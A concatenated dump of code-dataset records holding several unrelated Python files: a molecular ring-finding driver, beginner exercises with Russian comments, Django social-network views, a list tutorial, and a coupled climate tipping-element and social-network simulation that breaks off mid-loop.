wm.displayMap()\n pp.plotPathPoints(PathPoints,wm.plot)\n wm.plot.show()\n \n # Podczas skanowania w ruchu mogą pojawić się opóźnienia między getPose,a getScan, więć mapa może się troche rozjechac.\n # Lepiej np. wziąć pozycje przed skanem, skan, po skanie i estymować pozycję, w której był robiony skan.\n # Można też zrobić samemu subscribera do pozycji i skanów. Ten z RosAriaDriver czasem się nie nadaje.\n","repo_name":"Luny-S/MobileRobotics_Lab5","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38379778055","text":"# Урок 4\n# Задание 1\n\nfrom sys import argv\nscript_name, pay_per_hour, hours, premium = argv\n\n\ndef calc_wage(pay_per_hour, hours, premium):\n wage = int(pay_per_hour) * int(hours) + int(premium)\n return wage\n\n\nprint(f\"Заработная плата сотрудника составляет {calc_wage(pay_per_hour, hours, premium)}\")\n\n# Задание 2\n\nmy_list = [300, 2, 12, 44, 1, 1, 4, 10, 7, 1, 78, 123, 55]\nnew_list = [my_list[el] for el in range(1, len(my_list))\n if my_list[el]>my_list[el-1]\n ]\nprint(new_list)\n\n# Задание 3\n\n# считая, что \"в пределах от 20 до 240\" включает \"240\"\ngen_list = [el for el in range(20, 241) if (el % 20 == 0 or el % 21 == 0)]\nprint(gen_list)\n\n# Задание 4\n\ntest_freq = [2, 2, 2, 7, 23, 1, 44, 44, 3, 2, 10, 7, 4, 11]\nfreq_list = [el for el in test_freq if test_freq.count(el) == 1]\nprint(freq_list)\n\n# Задание 5\n\neven_range = [el for el in range(100, 1001) if el % 2 == 0]\nrange_product = 1\nfor i in even_range:\n range_product = range_product * i\nprint(range_product)\n\n# Задание 6\n\nfrom itertools import count, cycle\n\n# а)\n\nstart = int(input('input start number: '))\nstop = int(input('input final number: '))\nfor el in count(start):\n if el > stop:\n break\n else:\n print(el)\n\n# б)\n\ni = 0\namount = int(input('input amount of iterations: '))\niterable_list = [1, 2, 3, 4, 5, 6, 7]\nfor el in cycle(iterable_list):\n if i >= amount:\n break\n print(el)\n i += 1\n \n# Задание 7\n\n\ndef fact(n):\n result = 1\n for i in range(1, n+1):\n result *= i\n yield result\n\n\nuser_fact = int(input('input number for calculating factorial: '))\nfor number in fact(user_fact):\n print(f'!{user_fact} = {number}')\n","repo_name":"stanwarp/gb_study","sub_path":"py_bas/lesson4.py","file_name":"lesson4.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38411000884","text":"from json.encoder import JSONEncoder\nfrom django.shortcuts import render\n\nfrom social_site.views import Login\nfrom .models import Post, Profile, Comments\nfrom django.http import JsonResponse\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import PostForm, EditForm\nfrom profiles.models import Profile\n# Create your views here.\n\n\n@login_required(login_url='login')\ndef index(request):\n form = PostForm\n editForm = EditForm(auto_id=\"edit_%s\")\n return render(request, 'posts/main.html', {'form': form, 'editForm': editForm})\n\ndef editSave(request):\n if request.is_ajax():\n post = Post.objects.get(id=request.POST.get('pk'))\n if post.author.user == request.user:\n postContent = request.POST.get('content')\n post.content = postContent\n post.save()\n return JsonResponse({})\n\ndef deletePost(request):\n if request.is_ajax():\n post = Post.objects.get(id=request.POST.get('pk'))\n if post.author.user == request.user:\n postJSON = {\n 'id': post.id\n }\n post.delete()\n return JsonResponse({'post': postJSON})\n\ndef editPost(request):\n if request.is_ajax():\n post = Post.objects.get(id=request.POST.get('pk'))\n if post.author.user == request.user:\n if post.image:\n postImage = post.image.url\n else:\n postImage = \"\"\n postJSON = {\n 'id': post.id,\n 'author': post.author.id,\n 'count': post.likeCount,\n 'content': post.content,\n 'postImage': postImage\n }\n \n return JsonResponse({'post': postJSON})\n else:\n return JsonResponse({'message':\"DONT TOUCH, YOU DONT OWN THIS!\"})\n\ndef postControl(request):\n if request.is_ajax():\n postImage = request.FILES.get('postedImage')\n postContent = request.POST.get('postContent')\n\n if postContent != '' or postImage != None:\n postCreator = Profile.objects.get(user=request.user)\n newPost = Post()\n newPost.image = postImage\n newPost.author = postCreator\n newPost.content = postContent\n newPost.save()\n if (postImage != None):\n postImageURL = newPost.image.url\n\n else:\n postImageURL = '/'\n newPostJSON = {\n 'id': newPost.id,\n 'author': newPost.author.id,\n 'content': newPost.content,\n 'count': newPost.likeCount,\n 'postImage': postImageURL,\n }\n newPostAuthorJSON = {\n 'name': postCreator.firstName + \" \" + postCreator.lastName,\n 'profilePic': str(postCreator.profilePic.url),\n 'firstName': postCreator.firstName,\n 'lastName': postCreator.lastName\n }\n return JsonResponse({'post': newPostJSON, 'author': newPostAuthorJSON})\n\n\ndef loadData(request):\n currentUser = request.user\n currentUserProfile = Profile.objects.get(user=currentUser)\n currentUserFriends = currentUserProfile.friends.all()\n\n friendsJSON = []\n for frnd in currentUserFriends:\n friendOBJ = Profile.objects.get(id=frnd.id)\n friend = {\n 'id': friendOBJ.id,\n 'firstName': friendOBJ.firstName,\n 'lastName': friendOBJ.lastName,\n }\n friendsJSON.append(friend)\n\n allComments = Comments.objects.all().order_by('-created')\n allCommentsListJSON = []\n for comment in allComments:\n com = {\n 'id': comment.id,\n 'comment': comment.comment,\n 'post': comment.post.id,\n 'commenter': comment.commenter.id,\n 'name': comment.commenter.firstName + \" \" + comment.commenter.lastName,\n 'profilePic': str(comment.commenter.profilePic.url)\n }\n allCommentsListJSON.append(com)\n\n allPosts = Post.objects.all().order_by('-created')\n allPostListJSON = []\n for post in allPosts:\n full_name = post.author.firstName + \" \" + post.author.lastName\n if (post.image):\n postImage = str(post.image.url)\n else:\n postImage = ''\n item = {\n 'id': post.id,\n 'content': post.content,\n 'author': post.author.user.id,\n 'authorFirstName': post.author.firstName,\n 'authorLastName': post.author.lastName,\n 'profilePic': str(post.author.profilePic.url),\n 'liked': True if request.user in post.liked.all() else False,\n 'count': post.likeCount,\n 'name': full_name,\n 'created': post.created,\n 'postImage': postImage\n }\n allPostListJSON.append(item)\n currentUserProfileJSON = {\n 'id': currentUserProfile.id,\n 'firstName': currentUserProfile.firstName,\n 'lastName': currentUserProfile.lastName,\n 'profilePic': str(currentUserProfile.profilePic.url)\n }\n return JsonResponse({'currentUser': currentUserProfileJSON, 'allPosts': allPostListJSON, 'friends': friendsJSON, 'comments': allCommentsListJSON})\n\n\ndef likeControl(request):\n if request.is_ajax():\n pk = request.POST.get('pk')\n post = Post.objects.get(id=pk)\n if request.user in post.liked.all():\n liked = False\n post.liked.remove(request.user)\n else:\n liked = True\n post.liked.add(request.user)\n return JsonResponse({'liked': liked, 'count': post.likeCount})\n\n\ndef commentControl(request):\n if request.is_ajax():\n pk = request.POST.get('pk')\n allComments = Comments.objects.all().order_by('created')\n post = Post.objects.get(id=pk)\n comment = Comments()\n comment.post = post\n comment.commenter = Profile.objects.get(user=request.user)\n commenterFullName = comment.commenter.firstName + \" \" + comment.commenter.lastName\n comment.comment = request.POST.get('comment')\n commentList = []\n for comments in allComments:\n commentOBJ = Comments.objects.get(id=comments.id)\n com = {\n 'id': commentOBJ.id,\n 'comment': commentOBJ.comment,\n 'post': commentOBJ.post.id,\n 'commenter': commentOBJ.commenter.user.id,\n 'profilePic': str(commentOBJ.commenter.profilePic.url)\n }\n commentList.append(com)\n if comment.comment != '':\n comment.save()\n return JsonResponse({'commentList': commentList, 'id': comment.id, 'comment': str(comment.comment), 'commenter': commenterFullName, 'profilePic': str(comment.commenter.profilePic.url)})\n","repo_name":"michael-rohweder/social.me","sub_path":"posts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6804,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"74096857431","text":"\nlist1 = []\nlist2 = [1, 56, \"s\", 34, 2.34, [\"s\", 2, 3, 4, 5, 6, \"Hello\"]]\nprint(list2)\n\na = [a + b for a in 'list' if a != 's' for b in 'soup' if b != 'u']\nprint(a)\n\nlist1.append(23)\nlist1.append(34)\nlist1.insert(0, 34)\nb = [24, 67]\nlist1.extend(b) # добавляем список b в конец списка list1\n# index, what to put in\nlist1.insert(2, 1988) # вставляем в список, указывая место вставки и затем что\nlist1.remove(34) # удаляет только первый такой элемент 34\nlist1.pop(0) # удаляет Итый элемент или удаляет элемент по индексу или если ничего не писать, удалит последний\nprint(list1.index(24)) # выводим индекс элемента из списка\nprint(list1.count(34)) # выводит количество заданных элементов из списка, указали 34, в списке 1 такой элемент\n\nlist1.sort() # сортирует список в порядке возрастания\nprint(list1)\n\nlist1.reverse() # переворачивает список\nprint(list1)\n\nlist1.clear() # очищает список\n\nprint(\"-----------END-------------\")\n\n\n\n\n\n","repo_name":"kolasau/Lessons","sub_path":"Lesson_7_Lists.py","file_name":"Lesson_7_Lists.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"71344717593","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jan 27 20:40:39 2018\r\n\r\ncontrols the force_field_code and ringalgothem to automaticely process molecules\r\nfor MD simulations.\r\n\r\n@author: Craig Melton\r\n\"\"\"\r\n\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nimport matplotlib.pyplot as plt\r\nimport time as t\r\n\r\nimport expected_ring_number as EV\r\nimport force_field_code_final as MD\r\nimport ringalgothem_final_2 as ring\r\n#import numpy as np\r\n\r\n#pdb reader\r\n\r\n#def ring_number_lists(molecule,Residue_number=[],Residue=[]):\r\n# \"\"\"creates lists for ringfinder number for each Residue\"\"\"\r\n# \r\n# if len(Residue_number) < 1:\r\n# Residue = []\r\n# for atom in molecule.atoms:\r\n# Residue.append(atom.pdb[22:26])\r\n# Residue = list(set(Residue))\r\n# \r\n# for res_mun in Residue:\r\n# Residue_number.append((res_mun,[]))\r\n## print(Residue, ' ', Residue_number)\r\n# else:\r\n# for atom in molecule.atoms:\r\n# for res_mun in Residue_number:\r\n# if atom.pdb[22:26] == res_mun[0]:\r\n# if len(res_mun[1]) < 1:\r\n# res_mun[1].append((atom.ID,[atom.ringfinder]))\r\n# else:\r\n# if res_mun[0] == atom.ID:\r\n# res_mun[1][1].append(atom.ringfinder)\r\n# \r\n# \r\n# return Residue_number, Residue\r\n \r\n\r\n \r\n# main function\r\n\r\ndef Main(file):#amino_acids):\r\n \"\"\"This function brings together the force_field_code and ringalgorithm scripts \r\n to fully automatedly processor molecule for molecular dynamics simulations \"\"\"\r\n \r\n cycle_times =[]\r\n chainremovials =[]\r\n groupcreations =[]\r\n group_setups =[]\r\n ring_finding_times =[]\r\n times_lists = [cycle_times,chainremovials,groupcreations,group_setups,ring_finding_times]\r\n group_nums =[]\r\n \r\n start = t.time()\r\n t1 = start\r\n last_time = t1\r\n \r\n \r\n \r\n \r\n molecule, n = MD.read_in_molecule_data_pdb(file)\r\n \r\n print('atoms # {}'.format(len(molecule.atoms)))\r\n print('timeout time {}'.format((60*2 + 60*(len(molecule.atoms)/1000)**2)))\r\n \r\n bonds, errors = molecule.connectivity(n)\r\n# molecule.Hydrogen_duplite_remove()\r\n \r\n molecule.non_H_connections_num()\r\n molecule.Extendedconnections()\r\n \r\n \r\n \r\n t2 = t.time()\r\n connectivity_time = t2 - last_time\r\n last_time = t2\r\n \r\n \r\n print(connectivity_time)\r\n \r\n ring.connections_num(molecule)\r\n \r\n# Residue_number, Residue = ring_number_lists(molecule)\r\n \r\n \r\n groups = []\r\n \r\n error_list = []\r\n\r\n groups_lists = []\r\n \r\n non_zero = []\r\n for atom1 in molecule.atoms:\r\n if atom1.ringfinder > 0:\r\n non_zero.append(atom1)\r\n ring.carbonyl_groups(molecule)\r\n j = 0\r\n \r\n \r\n for atom in molecule.atoms:\r\n atom.ringfinder_list.append(atom.ringfinder)\r\n \r\n \r\n \r\n \r\n t3 = t.time() \r\n ringsetup = t3 - last_time\r\n last_time = t3\r\n \r\n \r\n while len(non_zero) > 0 :\r\n print(len(non_zero))\r\n cycle_start = t.time()\r\n last_time = cycle_start\r\n \r\n ring.chain_end(molecule)\r\n \r\n pesent_time = t.time()\r\n chainremovial = pesent_time - last_time\r\n times_lists[1].append(chainremovial)\r\n last_time = pesent_time\r\n \r\n for atom in molecule.atoms:\r\n atom.ringfinder_list.append(atom.ringfinder)\r\n \r\n \r\n \r\n molecule.group_list, groupnum = ring.homogesis_atom_connections(molecule)\r\n group_nums.append(groupnum)\r\n \r\n pesent_time = t.time()\r\n groupcreation = pesent_time - last_time\r\n times_lists[2].append(groupcreation)\r\n last_time = pesent_time\r\n \r\n atoms_2 = []\r\n for atom in molecule.atoms:\r\n if atom.ringfinder == 0:\r\n atoms_2.append(atom)\r\n molecule.group_list.append(ring.group(atoms_2, -1))\r\n \r\n groups_lists.append(molecule.group_list)\r\n \r\n \r\n \r\n ring.atom_groups(molecule.group_list)\r\n \r\n \r\n ring.group_linkers(molecule.group_list)\r\n \r\n pesent_time = t.time()\r\n group_setup = pesent_time - last_time \r\n times_lists[3].append(group_setup)\r\n last_time = pesent_time\r\n\r\n error = ring.group_seach(molecule)\r\n \r\n pesent_time = t.time()\r\n ring_finding_time = pesent_time - last_time \r\n times_lists[4].append(ring_finding_time)\r\n last_time = pesent_time\r\n \r\n for atom in molecule.atoms:\r\n atom.ringfinder_list.append(atom.ringfinder)\r\n \r\n molecule.ring_cycles += 1\r\n \r\n cycle_finish = t.time()\r\n cycle_time = cycle_finish - cycle_start\r\n times_lists[0].append(cycle_time)\r\n last_time = cycle_finish\r\n \r\n if error == 'Failed_to_converage':\r\n t4 = t.time()\r\n ring_time = t4-t3\r\n molecule.metal_connections()\r\n \r\n MD.bond_hack(molecule)\r\n MD.bond_processing(molecule)\r\n \r\n \r\n \r\n finish = t.time()\r\n total_time = finish - start\r\n return (molecule, ring.count_non_zeroatoms(molecule), error_list, ring_time, connectivity_time, total_time, 'Failed_to_converage',ringsetup,times_lists,group_nums)\r\n\r\n non_zero = []\r\n for atom1 in molecule.atoms:\r\n if atom1.ringfinder > 0:\r\n non_zero.append(atom1)\r\n \r\n\r\n# for atom1 in atoms:\r\n# for bond2 in atom1.connectivity:\r\n# for atom3 in bond2.atoms:\r\n# atoms.append(atom3)\r\n# atoms = list(set(atoms))\r\n \r\n \r\n \r\n \r\n t4 = t.time()\r\n ring_time = t4-t3\r\n if molecule.group_list != groups:\r\n groups = molecule.group_list\r\n else:\r\n j += 1\r\n if j == 2:\r\n print('shorter limit used')\r\n for group in molecule.group_list:\r\n if group.valence > 0:\r\n for atom in group.atoms:\r\n# if atom.symbol in ['C', 'N', 'O']:\r\n for bond in atom.connectivity:\r\n# if bond[1].symbol in ['C', 'N', 'O']:\r\n if bond[0] >= 2.00: \r\n if bond[1].symbol != 'H': \r\n atom.ringfinder -= 1\r\n \r\n# for atom in molecule.atoms:\r\n# for bond in atom.connectivity:\r\n# if bond[1].ringfinder > 0:\r\n# atom.ringfinder2 += 1\r\n# \r\n# for atom in molecule.atoms:\r\n# if atom.symbol != 'H':\r\n# atom.ringfinder = atom.ringfinder2\r\n \r\n for atom in molecule.atoms:\r\n atom.ringfinder_list.append(atom.ringfinder)\r\n \r\n if j == 6:\r\n# print('Failed_to_converage\\n')\r\n molecule.metal_connections()\r\n \r\n MD.bond_hack(molecule)\r\n MD.bond_processing(molecule)\r\n \r\n \r\n \r\n finish = t.time()\r\n total_time = finish - start\r\n return (molecule, ring.count_non_zeroatoms(molecule), error_list, ring_time, connectivity_time, total_time, 'Failed_to_converage',ringsetup,times_lists,group_nums)\r\n print('current_ring_time {}'.format(t4-t3)) \r\n# if t4-t3 > (60*2 + 60*(len(molecule.atoms)/1000)**2):\r\n# print(t4-t3)\r\n## print(\"timed out error\")\r\n# error_list.append((t4-t3,\"timed out error\"))\r\n# molecule.metal_connections()\r\n# MD.bond_hack(molecule)\r\n# \r\n## timeout = ring.count_non_zeroatoms(molecule)\r\n# finish = t.time()\r\n# total_time = finish - start \r\n# return (molecule, ring.count_non_zeroatoms(molecule), error_list, ring_time, connectivity_time, total_time, 'TimeoutError')\r\n \r\n molecule.metal_connections()\r\n \r\n MD.bond_hack(molecule)\r\n MD.bond_processing(molecule)\r\n \r\n \r\n for atom in molecule.atoms:\r\n atom.ringfinder_list.append(atom.ringfinder)\r\n \r\n try:\r\n ring_time = t4-t3\r\n except UnboundLocalError:\r\n t4 = t.time()\r\n ring_time = t4-t3\r\n finish = t.time()\r\n total_time = finish - start \r\n \r\n \r\n return (molecule, ring.count_non_zeroatoms(molecule), error_list, ring_time, connectivity_time, total_time, 'succefull_convergation',ringsetup,times_lists,group_nums) #(molecule, groups_lists)\r\n\r\n\r\n\r\ngrouptype = {2: 'b', 1: 'r', 3: 'g', 0: 'w', 4: 'y', 5:'m'}\r\n\r\ndef main(molecule, groups_list):\r\n \"\"\"construting connectivit graph\"\"\"\r\n for group_list in groups_list:\r\n plt.style.use('dark_background')\r\n fig = plt.figure()\r\n ax = fig.add_subplot(111, projection='3d')\r\n \r\n \r\n for group in group_list:\r\n colour = grouptype[group.valence]\r\n for atom in group.atoms:\r\n x = atom.position[0]\r\n y = atom.position[1]\r\n z = atom.position[2]\r\n \r\n ax.scatter(x, y, z, c=colour ,marker='o')\r\n \r\n \r\n \r\n for bond in list(molecule.bonds):\r\n try:\r\n x1 = bond.atoms[0].position[0]\r\n y1 = bond.atoms[0].position[1]\r\n z1 = bond.atoms[0].position[2]\r\n x2 = bond.atoms[1].position[0]\r\n y2 = bond.atoms[1].position[1]\r\n z2 = bond.atoms[1].position[2]\r\n ax.plot([x1,x2], [y1,y2], [z1,z2], 'w-')\r\n # if bond.atom[0].symbol == bond.atom[1].symbol:\r\n # color = atomtype[bond.atom[0].symbol] + '-'\r\n # ax.plot([x1,x2], [y1,y2], [z1,z2], color)\r\n # else:\r\n # color1 = atomtype[bond.atom[0].symbol] + '-'\r\n # color2 = atomtype[bond.atom[1].symbol] + '-'\r\n # ax.plot([x1,(x2-x1)/2], [y1,(y2-y1)/2], [z1,(z2-z1)/2], color1)\r\n # ax.plot([(x2-x1)/2,x2], [(y2-y1)/2,y2], [(z2-z1)/2,z2], color2)\r\n except AttributeError:\r\n continue\r\n ax.set_xlabel('x')\r\n ax.set_ylabel('y')\r\n ax.set_zlabel('z')\r\n \r\n \r\n plt.show()\r\n return None\r\n\r\n#Asn-Gln-Leu-Pro-Tyr2.xyz\r\n# new_tests1.xyz\r\n# test2.xyz\r\n#test1 = Main('Asn-Gln-Leu-Pro-Tyr2.pdb')\r\n#\r\n#main(test1, group)\r\n\r\n\r\n\r\ndef group_brakedown(group_list):\r\n \"\"\"takes atoms from molecule and then returns a list directery with the \r\n number of each atom type present\"\"\"\r\n group_types = {}\r\n for group1 in group_list:\r\n group_types[(group1.size,group1.valence)] = 1 + group_types.get((group1.size,group1.valence), 0)\r\n return group_types\r\n\r\n\r\n\r\ndef bond_brakedown(atoms):\r\n \"\"\" \"\"\"\r\n i = 1\r\n bond_types = {}\r\n for atom1 in atoms:\r\n for atom3 in atom1.connectivity:\r\n for atom2 in atoms[i:]:\r\n if atom3 == atom2:\r\n for atom4 in atom2.connectivity:\r\n if atom4 == atom1:\r\n symbols = [atom1.symbol, atom2.symbol]\r\n symbols.sort()\r\n bond = '{}-{}'.format(symbols)\r\n bond_types[bond] = 1 + bond_types.get(bond, 0)\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"craig260/connectivity-ringfinding-algorithm","sub_path":"MD_main_final_2.py","file_name":"MD_main_final_2.py","file_ext":"py","file_size_in_byte":11901,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"28783714155","text":"# Add modules directory to path\nfrom audioop import avg\nimport os\nimport sys\n\nsys.path.append('')\n\n# global imports\nimport numpy as np\nimport matplotlib\n#matplotlib.use(\"Agg\")\nmatplotlib.use( 'tkagg' )\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nsns.set(font_scale=1.)\nimport itertools\nimport time\nimport glob\nfrom PyPDF2 import PdfFileMerger\nimport tkinter\n\n# private imports from sys.path \nfrom core.evolve import evolve\n\n#private imports for earth system\nfrom earth_sys.timing_no_enso import timing\nfrom earth_sys.functions_earth_system_no_enso import global_functions\nfrom earth_sys.earth_no_enso import earth_system\n\n#private imports from Saverio's model\nfrom earth_sys.nzmodel import nzmodel\nfrom gran_wied.gwmodel import gwmodel\n\n\n#for cluster computations\nos.chdir(\"/Users/jasminezhang/Documents/PIK22\")\n\n#measure time\n#start = time.time()\n#############################GLOBAL SWITCHES#########################################\ntime_scale = True # time scale of tipping is incorporated\nplus_minus_include = True # from Kriegler, 2009: Unclear links; if False all unclear links are set to off state and only network \"0-0\" is computed\nswitch_unc = True # if uncertainty is taken into account at all\nswitch_unc_barrett = False # is there an uncertainty in the thresholds, which lowers the ability to cooperate (following Barrett et al., Nature Climate Change, 2014)\n######################################################################\n\n\n# switch_unc_barrett cannot be True in case switch_unc is False\nif switch_unc == False:\n if switch_unc_barrett == True:\n print(\"Switch_unc_barrett cannot be True in case switch_unc is False - Please check !!!\")\n print(\"The percevied uncertainty (Barrett) does not make sense if overall uncertainty about threshold is zero\")\n quit()\n\n## temperature uncertainty that has to be taken into account\nunc_temp = np.array([[0.8, 3.0], [1.4, 8.0], [1.0, 3.0], [2.0, 6.0]]) #limit of critical temperature thresholds of GIS, THC, WAIS, AMAZ\n\n\n#actual real simulation years\nduration = 6000 \n# previously 50000\n\n\n#Names to create the respective directories\nnamefile = \"no\"\nif switch_unc_barrett == False and switch_unc == True:\n long_save_name = \"results_degreeChanges\"\nelif switch_unc_barrett == True and switch_unc == True:\n long_save_name = \"results_barrett_3\"\nelif switch_unc_barrett == False and switch_unc == False:\n long_save_name = \"results_no_uncertainty_3\"\n print(\"We don't want to compute this at the moment!\")\n quit()\nelse:\n print(\"Check switches of uncertainty\")\n quit()\n\n#######################GLOBAL VARIABLES##############################\n#drive coupling strength\ncoupling_strength = np.linspace(0.0, 1.0, 6, endpoint=True)\n# previusly 11\n\n########################Declaration of variables from passed values#######################\n#Must sort out first value since this is the actual file \nsys_var = np.array(sys.argv[1:], dtype=str) #low sample -3, intermediate sample: -2, high sample: -1\n#####################################################################\n\n\n#Tipping ranges from distribution\nlimits_gis, limits_thc, limits_wais, limits_amaz, limits_nino = float(sys_var[0]), float(sys_var[1]), float(sys_var[2]), float(sys_var[3]), float(sys_var[4])\n\n#Probability fractions\n# TO GIS\npf_wais_to_gis, pf_thc_to_gis = float(sys_var[5]), float(sys_var[6])\n# TO THC\npf_gis_to_thc, pf_nino_to_thc, pf_wais_to_thc = float(sys_var[7]), float(sys_var[8]), float(sys_var[9])\n# TO WAIS\npf_nino_to_wais, pf_thc_to_wais, pf_gis_to_wais = float(sys_var[10]), float(sys_var[11]), float(sys_var[12])\n# TO NINO\npf_thc_to_nino, pf_amaz_to_nino = float(sys_var[13]), float(sys_var[14])\n# TO AMAZ\npf_nino_to_amaz, pf_thc_to_amaz = float(sys_var[15]), float(sys_var[16])\n\n#tipping time scales\ntau_gis, tau_thc, tau_wais, tau_nino, tau_amaz = float(sys_var[17]), float(sys_var[18]), float(sys_var[19]), float(sys_var[20]), float(sys_var[21])\n\n\n\n#Time scale\n\"\"\"\nAll tipping times are computed ion comparison to the Amazon rainforest tipping time. As this is variable now, this affects the results to a (very) level\n\"\"\"\nif time_scale == True:\n print(\"compute calibration timescale\")\n #function call for absolute timing and time conversion\n time_props = timing(tau_gis, tau_thc, tau_wais, tau_amaz, tau_nino)\n gis_time, thc_time, wais_time, nino_time, amaz_time = time_props.timescales()\n conv_fac_gis = time_props.conversion()\nelse:\n #no time scales included\n gis_time = thc_time = wais_time = nino_time = amaz_time = 1.0\n conv_fac_gis = 1.0\n\n#include uncertain \"+-\" links:\nif plus_minus_include == True:\n plus_minus_links = np.array(list(itertools.product([-1.0, 0.0, 1.0], repeat=3)))\n\n #in the NO_ENSO case (i.e., the second link must be 0.0)\n plus_minus_data = []\n for pm in plus_minus_links:\n if pm[1] == 0.0:\n plus_minus_data.append(pm)\n plus_minus_links = np.array(plus_minus_data)\n\nelse:\n plus_minus_links = [np.array([1., 1., 1.])]\n\n\n#directories for the Monte Carlo simulation\n#mc_dir = int(sys_var[-1])\nmc_dir = 0\n\n\n################################# MAIN #################################\n#Create Earth System\nearth_system = earth_system(gis_time, thc_time, wais_time, nino_time, amaz_time,\n limits_gis, limits_thc, limits_wais, limits_nino, limits_amaz,\n pf_wais_to_gis, pf_thc_to_gis, pf_gis_to_thc, pf_nino_to_thc,\n pf_wais_to_thc, pf_gis_to_wais, pf_thc_to_wais, pf_nino_to_wais,\n pf_thc_to_nino, pf_amaz_to_nino, pf_nino_to_amaz, pf_thc_to_amaz)\n\n#####Variables to be set\n#Create Social Model\n\nthreshold_frac = 0.5\n#avg_degree = 10\na = 0.14\nets = 0.5\nc = 0.6\ntr = 0.01\n\n\n################################# MAIN LOOP #################################\n#for kk in plus_minus_links:\nfinalTemp = []\nfinalTipped = []\nfinalActive = []\nfinalTimes = []\n\nkk = [-1,0,-1]\n#EnvToSocCoupling = np.linspace(0.0, 1, 21, endpoint=True)\n#degrees = np.linspace(5, 15, 11, endpoint=True)\ndegrees = [3, 4, 5, 6, 7, 8, 9, 10, 12, 14, 16, 18, 20, 30, 40, 50]\n\nfor avg_degree in degrees:\n allTipped = False\n\n #print(\"Wais to Thc:{}\".format(kk[0]))\n #print(\"Amaz to Nino:{}\".format(kk[1]))\n #print(\"Thc to Amaz:{}\".format(kk[2]))\n try:\n os.stat(\"{}\".format(long_save_name))\n except:\n os.makedirs(\"{}\".format(long_save_name))\n\n try:\n os.stat(\"{}/{}_feedbacks\".format(long_save_name, namefile))\n except:\n os.mkdir(\"{}/{}_feedbacks\".format(long_save_name, namefile))\n\n try:\n os.stat(\"{}/{}_feedbacks/{:.2f}_{:.2f}\".format(long_save_name, namefile, a, c))\n except:\n os.mkdir(\"{}/{}_feedbacks/{:.2f}_{:.2f}\".format(long_save_name, namefile, a, c))\n\n try:\n os.stat(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}\".format(long_save_name, namefile, a, c, kk[0], kk[1], kk[2]))\n except:\n os.mkdir(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}\".format(long_save_name, namefile, a, c, kk[0], kk[1], kk[2]))\n\n try:\n os.stat(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}\".format(long_save_name, namefile, a, c, kk[0], kk[1], kk[2]))\n except:\n os.mkdir(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}\".format(long_save_name, namefile, a, c, kk[0], kk[1], kk[2]))\n\n #save starting conditions\n np.savetxt(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/empirical_values_care{}_{}.txt\".format(long_save_name, namefile, a, c, kk[0], kk[1], kk[2], a, c), sys_var, delimiter=\" \", fmt=\"%s\")\n\n\n \n times = []\n\n #for strength in coupling_strength:\n strength = 0.2\n #print(\"Coupling strength: {:.2f}\".format(strength))\n\n print(\"degree: \", avg_degree)\n\n \n # if os.path.isfile(\"{}/{}_feedbacks/{:.2f}_{:.2f}/network_{}_{}_{}/feedbacks_care{:.2f}_{:.2f}_{:.2f}_{:.3f}.txt\".format(long_save_name, \n # namefile, ets, c, kk[0], kk[1], kk[2], ets, c, strength, ets)) == True:\n # print(\"File already computed\")\n # continue\n\n tippedElements = 0\n granTipped = False\n output = []\n gmt = [0]\n # roots = np.empty((duration,3,))\n # roots[:] = np.nan\n first = True\n firstRoot = []\n numTipped = []\n closeGis, closeThc, closeWais, closeAmaz = -1.0, -1.0, -1.0, -1.0\n\n for t in range(2, int(duration)+2):\n \n\n ######THE SOCIAL MODEL\n #model = gwmodel(threshold_frac,avg_degree,a+tippedElements*0.05,c-tippedElements*0.05)\n\n # take the negative ones (not yet tipped) between -1 and 0\n # only care about specific value for negatives (cuz that's how close)\n # the smaller the number the better\n changeGis = np.min(closeGis, 0)\n changeThc = np.min(closeThc, 0)\n changeWais = np.min(closeWais, 0)\n changeAmaz = np.min(closeAmaz, 0)\n totalChange = changeGis + changeThc + changeWais + changeAmaz + 4 # total change is positive, 0 to 4\n totalChange = totalChange / 4 * c * ets\n\n model = gwmodel(threshold_frac,avg_degree, a+totalChange, c-totalChange)\n ###END SOCIAL MODEL\n\n ######THE NATURAL MODEL\n effective_GMT = gmt[-1]\n\n #get back the network of the Earth system\n net = earth_system.earth_network(effective_GMT, strength, kk[0], kk[1], kk[2])\n\n # initialize state\n if t == 2:\n initial_state = [-1, -1, -1, -1] #initial state\n else:\n initial_state = [ev.get_timeseries()[1][-1, 0], ev.get_timeseries()[1][-1, 1], ev.get_timeseries()[1][-1, 2], ev.get_timeseries()[1][-1, 3]]\n ev = evolve(net, initial_state)\n # plotter.network(net)\n\n # Timestep to integration; it is also possible to run integration until equilibrium\n timestep = 0.1\n\n #t_end given in years; also possible to use equilibrate method\n t_end = 1.0/conv_fac_gis #simulation length in \"real\" years, in this case 1 year\n ev.integrate(timestep, t_end)\n #######END: THE NATURAL MODEL\n\n tippedElements = net.get_number_tipped(ev.get_timeseries()[1][-1])\n closeGis = ev.get_timeseries()[1][-1, 0]\n closeThc = ev.get_timeseries()[1][-1, 1], \n closeWais = ev.get_timeseries()[1][-1, 2]\n closeAmaz = ev.get_timeseries()[1][-1, 3]\n\n if((not allTipped) and tippedElements==4):\n finalTimes.append(t-1)\n allTipped = True\n\n if t==2:\n root_x, root_y = model.guess(a)\n else:\n root_x, root_y = model.guess(firstRoot[-1])\n\n 